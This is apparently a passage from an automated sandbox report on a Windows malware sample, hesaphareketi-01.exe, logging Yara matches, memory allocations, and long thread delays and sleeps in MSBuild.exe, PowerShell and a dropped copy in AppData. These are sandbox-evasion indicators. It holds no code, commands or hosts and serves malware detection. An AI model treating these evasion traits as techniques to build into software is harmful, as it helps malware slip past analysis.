            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: hesaphareketi-01.exe PID: 5392, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WvaGpcFVX.exe PID: 7304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 2980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 8B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: 9B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: A090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: B090000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: C090000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C90000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4C90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 7A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 8A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 8C20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: 9C20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: A1B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMemory allocated: B1B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11C0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2DF0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2C40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599321Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598874Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598650Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597201Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597090Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596852Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596692Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596524Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596072Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595836Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594952Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593858Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599234
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598797
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598687
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598295
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598187
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597555
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597219
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596672
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596234
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595764
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595656
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595547
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595436
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594984
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594875
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594656
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594547
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593889
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5182Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5315Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6453Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3377Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2057
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 7799
            Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 3768Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 5182 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep count: 220 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7508Thread sleep count: 6453 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7508Thread sleep count: 3377 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599655s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599321s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598874s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598650s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598421s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597655s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597546s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597201s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -597090s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596852s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596692s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596524s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596203s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -596072s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595836s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595718s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595171s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -595062s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594952s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594515s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594406s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594296s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594187s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -594078s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -593968s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7500Thread sleep time: -593858s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe TID: 7392Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7812Thread sleep count: 2057 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599890s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599781s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7812Thread sleep count: 7799 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599672s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599562s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599453s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599344s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599234s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599125s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -599015s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598906s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598797s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598687s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598578s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598469s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598295s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -598187s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597555s >= -30000s
